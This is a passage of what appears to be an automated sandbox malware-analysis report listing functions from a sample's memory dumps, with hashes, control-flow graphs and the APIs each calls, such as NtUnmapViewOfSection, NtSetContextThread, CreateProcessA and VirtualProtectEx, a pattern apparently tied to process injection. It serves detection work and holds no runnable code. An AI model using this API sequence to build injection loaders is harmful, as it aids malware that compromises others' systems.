                                                              • Instruction Fuzzy Hash: 271106B19003488FDB10DF9AC484B9EFBF8FB49314F108459D518A7351D375A944CFA5
                                                              Function 04C18A54 Relevance: 1.5, APIs: 1, Instructions: 48nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtSetContextThread.NTDLL(?,?), ref: 04C1B902
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ContextThread
                                                              • String ID:
                                                              • API String ID: 1591575202-0
                                                              • Opcode ID: 739b78e1a39aaf8667281ada0be162f40ecf39363268bc20c9d6b2a792fd8af2
                                                              • Instruction ID: 388311c9e41fefa5863ddd035b1d7380bcfe3079d7ccc3e8a5d8cfa0d87c6a8f
                                                              • Opcode Fuzzy Hash: 739b78e1a39aaf8667281ada0be162f40ecf39363268bc20c9d6b2a792fd8af2
                                                              • Instruction Fuzzy Hash: 421106B19003488FDB10DF9AC484B9EBBF9FB49314F108459E518A7351D379A944CFA5
                                                              Function 04C18A18 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 04C1B23A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: SectionUnmapView
                                                              • String ID:
                                                              • API String ID: 498011366-0
                                                              • Opcode ID: f759fc8340ffde764babf010b06efa33a09a27afd00400a905836a8b126f510f
                                                              • Instruction ID: 57d55d00bce37577e12e30aa5cc32fa5f44bafc55cef4bd130308517e1b63447
                                                              • Opcode Fuzzy Hash: f759fc8340ffde764babf010b06efa33a09a27afd00400a905836a8b126f510f
                                                              • Instruction Fuzzy Hash: 2811F5B59006488FDB10DF9AD884BAEBBF8EB89314F208459D518B7350D378A944CFA5
                                                              Function 04C1B898 Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtSetContextThread.NTDLL(?,?), ref: 04C1B902
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ContextThread
                                                              • String ID:
                                                              • API String ID: 1591575202-0
                                                              • Opcode ID: b4d65d5a280697232348d6a94a1e298e9ffec5797941f8c48ac5e18e411b9983
                                                              • Instruction ID: b25dd53015dc4c2b2b116efbd4f496e078a919c5910cc7a3bfed9f756d64c68e
                                                              • Opcode Fuzzy Hash: b4d65d5a280697232348d6a94a1e298e9ffec5797941f8c48ac5e18e411b9983
                                                              • Instruction Fuzzy Hash: 9B1122B19002488FCB10DF9AC484BDEBFF4EB49320F208419D528A7310D378AA44CFA1
                                                              Function 04C1B1D0 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 04C1B23A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: SectionUnmapView
                                                              • String ID:
                                                              • API String ID: 498011366-0
                                                              • Opcode ID: 899c3848d01bea12a000c9297671ae638a18a0b6aa87e89d5853edee67895a18
                                                              • Instruction ID: 539e1d8b40a34b8995f5c6f188561d46c287b09593561bda6548d0936931e700
                                                              • Opcode Fuzzy Hash: 899c3848d01bea12a000c9297671ae638a18a0b6aa87e89d5853edee67895a18
                                                              • Instruction Fuzzy Hash: 4011F2B59003498FCB10DF9AD988B9EFBF8FF89314F208419D518A7251D379A944CFA5
                                                              Function 04C191D1 Relevance: .5, Instructions: 469COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b997eae4c2d02dc3172a94e136a12adbeff0c0570ddfcdc273e919de688c6c51
                                                              • Instruction ID: 8d65c5af3c949c4c101aec539410219d45810cf19a301a7e9dba1cea0f3577ee
                                                              • Opcode Fuzzy Hash: b997eae4c2d02dc3172a94e136a12adbeff0c0570ddfcdc273e919de688c6c51
                                                              • Instruction Fuzzy Hash: C2327774E00219CFDB64CF69D994B99BBB2BF49310F1181E9E809A7361DB31AE85DF10
                                                              Function 04C17A28 Relevance: .3, Instructions: 262COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b61de67a16bde00312d61932395af42e4edd077b5615ae7b31e53558f0c7163
                                                              • Instruction ID: cab0870fb4166acec2d8c0256e496d725dc2dd95a4598200f8f151d18f18ba5d
                                                              • Opcode Fuzzy Hash: 2b61de67a16bde00312d61932395af42e4edd077b5615ae7b31e53558f0c7163
                                                              • Instruction Fuzzy Hash: 75A142357001049FD748DFA8C5A1A69F7A3EBCA314F24C56EE9069B395CF36AD039B80
                                                              Function 04C17F20 Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aaae8add17222ed4cd0904c0be873fd30cd27b7ce948aa0b256e85f750e77233
                                                              • Instruction ID: 5c8a3fbc39f7ba480dca34d09917fb7315ea119109c950670a218627cb0df472
                                                              • Opcode Fuzzy Hash: aaae8add17222ed4cd0904c0be873fd30cd27b7ce948aa0b256e85f750e77233
                                                              • Instruction Fuzzy Hash: 21919371E002099FDB45DFF5C5506EFBBB2EF89304F10456AE202BB261EB359A05AB91
                                                              Function 04C17F30 Relevance: .2, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3e5bd99832d7d0768204e4c13c18b64975d30b880d1c140b46fd32a5074295c
                                                              • Instruction ID: 31021986cc8b37b29c2689505239f91e9359678a5f8153fe4e55ea781989fd1a
                                                              • Opcode Fuzzy Hash: b3e5bd99832d7d0768204e4c13c18b64975d30b880d1c140b46fd32a5074295c
                                                              • Instruction Fuzzy Hash: 0A919571E001099FDB45DFF5C5506EFBBB2EF89304F10456AE202BB261EB359A05AF91
                                                              Function 00E36A20 Relevance: .2, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9fce3fd878135866a28ee36ea0d0c707f1b98870dfba12b8b01bf2d3abc57eb9
                                                              • Instruction ID: bbefc02fd1947551273f59ea6a61aa5b86f557211292ac9a78988751c781d7fc
                                                              • Opcode Fuzzy Hash: 9fce3fd878135866a28ee36ea0d0c707f1b98870dfba12b8b01bf2d3abc57eb9
                                                              • Instruction Fuzzy Hash: 4F912AB5A041548FCB18CF68C48896CBBB2FF89310B1591AAE45AEB372C731ED41DF50
                                                              Function 00E36A11 Relevance: .2, Instructions: 193COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e83d45ca8b39f7a7a89e221b9d34c1db9f463a85a44257f2dacaef8c649c063a
                                                              • Instruction ID: ad88c188d61930383603149be01e49d4285cbeeda50590b5e7d1c79fccb4da75
                                                              • Opcode Fuzzy Hash: e83d45ca8b39f7a7a89e221b9d34c1db9f463a85a44257f2dacaef8c649c063a
                                                              • Instruction Fuzzy Hash: FC8119B4A041548FCB18CF68C48896CBBF2FF89314B16919AE846EB372C731ED41DB50
                                                              Function 04BD0930 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4bd0930-4bd093b 1 4bd093d-4bd0943 0->1 2 4bd0953-4bd0957 0->2 3 4bd0945 1->3 4 4bd0947-4bd0951 1->4 5 4bd0959-4bd095f 2->5 6 4bd0971-4bd098d 2->6 3->2 4->2 7 4bd0961 5->7 8 4bd0963-4bd096f 5->8 12 4bd0993-4bd0996 6->12 7->6 8->6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ojq$(ojq$4'jq$4'jq
                                                              • API String ID: 0-468369183
                                                              • Opcode ID: 2705a5aa2de0f270a3340925faa7e66bbcd71c815cab73ee8115d812a3ed19a6
                                                              • Instruction ID: 1f9b2a4902e31387bc4ab304fd661d6b1de016f1dafe56d32225963333f473c0
                                                              • Opcode Fuzzy Hash: 2705a5aa2de0f270a3340925faa7e66bbcd71c815cab73ee8115d812a3ed19a6
                                                              • Instruction Fuzzy Hash: 6EF0C235B802195BD728991E8824B27AA9AEFD4720F64C0EADA049B398E974EC018695
                                                              Function 04BD0916 Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 214 4bd0916-4bd093b 215 4bd093d-4bd0943 214->215 216 4bd0953-4bd0957 214->216 217 4bd0945 215->217 218 4bd0947-4bd0951 215->218 219 4bd0959-4bd095f 216->219 220 4bd0971-4bd098d 216->220 217->216 218->216 221 4bd0961 219->221 222 4bd0963-4bd096f 219->222 226 4bd0993-4bd0996 220->226 221->220 222->220
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ojq$4'jq
                                                              • API String ID: 0-4148772637
                                                              • Opcode ID: 5af02611ecb62c78e0f13c8e2c45b1b626e441e886698697d8c2adfaea2e42a8
                                                              • Instruction ID: a0bf0b00337158b42dd6d3d886d05c5376313629c10b0f729d2979f4566e9c47
                                                              • Opcode Fuzzy Hash: 5af02611ecb62c78e0f13c8e2c45b1b626e441e886698697d8c2adfaea2e42a8
                                                              • Instruction Fuzzy Hash: 04F02D76B052518FE7249A1CC810B267B21DFD1724F29C0DBD6449F2E5E574DC068341
                                                              Function 04BD032E Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 227 4bd032e-4bd0358 228 4bd035c-4bd0366 227->228 229 4bd035a 227->229 230 4bd0368-4bd036c 228->230 229->230 231 4bd036e-4bd0374 230->231 232 4bd0386-4bd038a 230->232 234 4bd0378-4bd0384 231->234 235 4bd0376 231->235 236 4bd0391-4bd0393 232->236 234->232 235->232
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq
                                                              • API String ID: 0-1204115232
                                                              • Opcode ID: 4d8ec2000938f92ec906b13a17a3850cb060cd8210b054d1d151c936ccc40a35
                                                              • Instruction ID: 54037f387069ffdec34cbb0086cbecf811d1f90b761f24d80a5873a3e2c19348
                                                              • Opcode Fuzzy Hash: 4d8ec2000938f92ec906b13a17a3850cb060cd8210b054d1d151c936ccc40a35
                                                              • Instruction Fuzzy Hash: D7F02B71F4D3954FC71A1B2C54201267E97AFCA120F9945FFC880CB1E6EA348C45C346
                                                              Function 04BD043E Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 238 4bd043e-4bd0468 239 4bd046c-4bd0476 238->239 240 4bd046a 238->240 241 4bd0478-4bd047c 239->241 240->241 243 4bd047e-4bd0484 241->243 244 4bd0496-4bd049a 241->244 245 4bd0488-4bd0494 243->245 246 4bd0486 243->246 247 4bd04a1-4bd04a3 244->247 245->244 246->244
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq
                                                              • API String ID: 0-1204115232
                                                              • Opcode ID: 470208eeb8e06aa173056ccbfe988c8719c0ad3ba622dde63c65e23b1175dc59
                                                              • Instruction ID: 6619117ddfcd6c0e562e6315edd2baae7536ff5dca449380e74894b674f2053a
                                                              • Opcode Fuzzy Hash: 470208eeb8e06aa173056ccbfe988c8719c0ad3ba622dde63c65e23b1175dc59
                                                              • Instruction Fuzzy Hash: 97F02471B493584FC76A2A2C6420126BEB7AFC5210F6948FFC4818B2D7F9248C418B82
                                                              Function 04C1AECC Relevance: 1.7, APIs: 1, Instructions: 218processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 298 4c1aecc-4c1af3c 300 4c1af90-4c1afb0 298->300 301 4c1af3e-4c1af63 298->301 305 4c1afb2-4c1afd7 300->305 306 4c1b004-4c1b034 300->306 301->300 304 4c1af65-4c1af67 301->304 307 4c1af69-4c1af73 304->307 308 4c1af8a-4c1af8d 304->308 305->306 313 4c1afd9-4c1afdb 305->313 315 4c1b036-4c1b05e 306->315 316 4c1b08b-4c1b0ab 306->316 309 4c1af75 307->309 310 4c1af77-4c1af86 307->310 308->300 309->310 310->310 314 4c1af88 310->314 317 4c1afdd-4c1afe7 313->317 318 4c1affe-4c1b001 313->318 314->308 315->316 326 4c1b060-4c1b062 315->326 324 4c1b0bb-4c1b10c CreateProcessA 316->324 325 4c1b0ad-4c1b0b9 316->325 319 4c1afe9 317->319 320 4c1afeb-4c1affa 317->320 318->306 319->320 320->320 323 4c1affc 320->323 323->318 327 4c1b115-4c1b14e 324->327 328 4c1b10e-4c1b114 324->328 325->324 329 4c1b085-4c1b088 326->329 330 4c1b064-4c1b06e 326->330 336 4c1b150-4c1b154 327->336 337 4c1b15e-4c1b162 327->337 328->327 329->316 332 4c1b070 330->332 333 4c1b072-4c1b081 330->333 332->333 333->333 334 4c1b083 333->334 334->329 336->337 338 4c1b156 336->338 339 4c1b172-4c1b176 337->339 340 4c1b164-4c1b168 337->340 338->337 342 4c1b186 339->342 343 4c1b178-4c1b17c 339->343 340->339 341 4c1b16a 340->341 341->339 345 4c1b187 342->345 343->342 344 4c1b17e 343->344 344->342 345->345
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 04C1B0FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: c59d7ffbf8bef5f4af6f22c611e03fddd31afa47192e7566885e94ec8fe3785f
                                                              • Instruction ID: cf70afc55e274723975af0d4b80ca7c7de74b5ab1e5409c49bacd41746256ee0
                                                              • Opcode Fuzzy Hash: c59d7ffbf8bef5f4af6f22c611e03fddd31afa47192e7566885e94ec8fe3785f
                                                              • Instruction Fuzzy Hash: 40815EB1E002099FDB10CFA8C8857EDBBF2FB49304F148129E814E72A4E775A981DF81
                                                              Function 04C18A0C Relevance: 1.7, APIs: 1, Instructions: 218processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 249 4c18a0c-4c1af3c 252 4c1af90-4c1afb0 249->252 253 4c1af3e-4c1af63 249->253 257 4c1afb2-4c1afd7 252->257 258 4c1b004-4c1b034 252->258 253->252 256 4c1af65-4c1af67 253->256 259 4c1af69-4c1af73 256->259 260 4c1af8a-4c1af8d 256->260 257->258 265 4c1afd9-4c1afdb 257->265 267 4c1b036-4c1b05e 258->267 268 4c1b08b-4c1b0ab 258->268 261 4c1af75 259->261 262 4c1af77-4c1af86 259->262 260->252 261->262 262->262 266 4c1af88 262->266 269 4c1afdd-4c1afe7 265->269 270 4c1affe-4c1b001 265->270 266->260 267->268 278 4c1b060-4c1b062 267->278 276 4c1b0bb-4c1b10c CreateProcessA 268->276 277 4c1b0ad-4c1b0b9 268->277 271 4c1afe9 269->271 272 4c1afeb-4c1affa 269->272 270->258 271->272 272->272 275 4c1affc 272->275 275->270 279 4c1b115-4c1b14e 276->279 280 4c1b10e-4c1b114 276->280 277->276 281 4c1b085-4c1b088 278->281 282 4c1b064-4c1b06e 278->282 288 4c1b150-4c1b154 279->288 289 4c1b15e-4c1b162 279->289 280->279 281->268 284 4c1b070 282->284 285 4c1b072-4c1b081 282->285 284->285 285->285 286 4c1b083 285->286 286->281 288->289 290 4c1b156 288->290 291 4c1b172-4c1b176 289->291 292 4c1b164-4c1b168 289->292 290->289 294 4c1b186 291->294 295 4c1b178-4c1b17c 291->295 292->291 293 4c1b16a 292->293 293->291 297 4c1b187 294->297 295->294 296 4c1b17e 295->296 296->294 297->297
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 04C1B0FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 5a793defed70211e05f12c6c2ce59629789b785c98402d01e8cf164ec600ca69
                                                              • Instruction ID: 67bc9e223da1d8acef55b024c18b8cbb039b93f589e32eb81e8328bae33b0467
                                                              • Opcode Fuzzy Hash: 5a793defed70211e05f12c6c2ce59629789b785c98402d01e8cf164ec600ca69
                                                              • Instruction Fuzzy Hash: 98816DB1E002099FDB10CFA9C8857EDBBF2FB49314F148129E814E72A4E775A981DF81
                                                              Function 04C13727 Relevance: 1.6, APIs: 1, Instructions: 73memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 346 4c13727-4c137d0 VirtualProtect 348 4c137d2-4c137d8 346->348 349 4c137d9-4c137fa 346->349 348->349
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04C137C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 8fe8bd148963b9c5a5a029b6f712060c8a0b85732a8e00f174f940dab9b02191
                                                              • Instruction ID: 3a539b70b6a3fa5173a28a49f992ae90f67c1752ca5d02c072d8f1ef3dbab8d5
                                                              • Opcode Fuzzy Hash: 8fe8bd148963b9c5a5a029b6f712060c8a0b85732a8e00f174f940dab9b02191
                                                              • Instruction Fuzzy Hash: 8D216AB59043898FDB10CF9AC584ADEBFF5EF49320F10806AE458A7651C338AA45CFA1
                                                              Function 04C18A3C Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 366 4c18a3c-4c1b4cb VirtualProtectEx 369 4c1b4d4-4c1b4fc 366->369 370 4c1b4cd-4c1b4d3 366->370 370->369
                                                              APIs
                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 04C1B4BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: e22dfc2b5034c3d8cf34c32354a29aac5e3df2f4f8348f7fd66460242f9605c6
                                                              • Instruction ID: 483e8274a2d99d31efae16d0861f26f1725fba965ed7b5841aa07a62385c8687
                                                              • Opcode Fuzzy Hash: e22dfc2b5034c3d8cf34c32354a29aac5e3df2f4f8348f7fd66460242f9605c6
                                                              • Instruction Fuzzy Hash: CB2127B2900249DFDB10DF9AC484ADEBBF5FF49310F10C429E918A7250D778A944DFA1
                                                              Function 04C1B440 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 387 4c1b440-4c1b488 388 4c1b490-4c1b4cb VirtualProtectEx 387->388 389 4c1b4d4-4c1b4fc 388->389 390 4c1b4cd-4c1b4d3 388->390 390->389
                                                              APIs
                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 04C1B4BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 5083852b610c4702616a9e78957a640d1898f4fcc358d35bb03dcd9618e2469f
                                                              • Instruction ID: 702924c50ca93020d5877cf7b2717ad67fe8a9f63fe0438e92ed764f84611ffe
                                                              • Opcode Fuzzy Hash: 5083852b610c4702616a9e78957a640d1898f4fcc358d35bb03dcd9618e2469f
                                                              • Instruction Fuzzy Hash: 7B21F7B6D002499FCB10DF9AC584ADEBFF5FF49310F118429E928A7250D778AA45CFA1
                                                              Function 04C13750 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 393 4c13750-4c137d0 VirtualProtect 395 4c137d2-4c137d8 393->395 396 4c137d9-4c137fa 393->396 395->396
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04C137C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020772650.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4c10000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 5e395a3644206847c71f0539368ec743f0d95d5c933cf6bc1ab470bbe623ea77
                                                              • Instruction ID: 6bc78acb4455a2de9058372f3aecaa5d43bcb4aff1bd2ab16957ec73f76a22d0
                                                              • Opcode Fuzzy Hash: 5e395a3644206847c71f0539368ec743f0d95d5c933cf6bc1ab470bbe623ea77
                                                              • Instruction Fuzzy Hash: C621E4B59002499FDB10DF9AC984BDEFBF5FF49320F108429E958A7250D378AA44CFA1
                                                              Function 04BD0396 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2020665935.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bd0000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq
                                                              • API String ID: 0-3676250632
                                                              • Opcode ID: 4990869010f1a0b46822b28d3807947ad1f785ab555a9e76f79ac364f5ff9623
                                                              • Instruction ID: ce0f5873db62d807d5fe911b3ed96de5cd6610b6286cdd093290408ff697c7ae
                                                              • Opcode Fuzzy Hash: 4990869010f1a0b46822b28d3807947ad1f785ab555a9e76f79ac364f5ff9623
                                                              • Instruction Fuzzy Hash: 88112B31B0D3D58FC7272B2C14101797EA6ABCA534F5901EFC884DB2D6EA248C45C397
                                                              Function 00E35522 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pnq
                                                              • API String ID: 0-1150273632
                                                              • Opcode ID: 152fbba3681ba4a0e51bb40464ce89310ef094fed44c548c1c7656085099a07a
                                                              • Instruction ID: 780cc704fa706f210d46b867d470c71e9e491984a786ac34681e8c1fb339ae49
                                                              • Opcode Fuzzy Hash: 152fbba3681ba4a0e51bb40464ce89310ef094fed44c548c1c7656085099a07a
                                                              • Instruction Fuzzy Hash: 2D21D875A14228DFDB64CF28C944B99BBB6BF49700F1040D9E949EB325DB719E80CF51
                                                              Function 00E35572 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2019870097.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e30000_80c619d931fa4e5c89fe87aac0b6b143.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pnq
                                                              • API String ID: 0-1150273632
                                                              • Opcode ID: 1e7df1cce8f405a24c5b1399a4fc78500664c5ac820553ac15ed32d431209283
                                                              • Instruction ID: 99e7f93e4774195081fce1a1277d83cdf4db1427b563580fdb2e5c4f9025e09c
                                                              • Opcode Fuzzy Hash: 1e7df1cce8f405a24c5b1399a4fc78500664c5ac820553ac15ed32d431209283
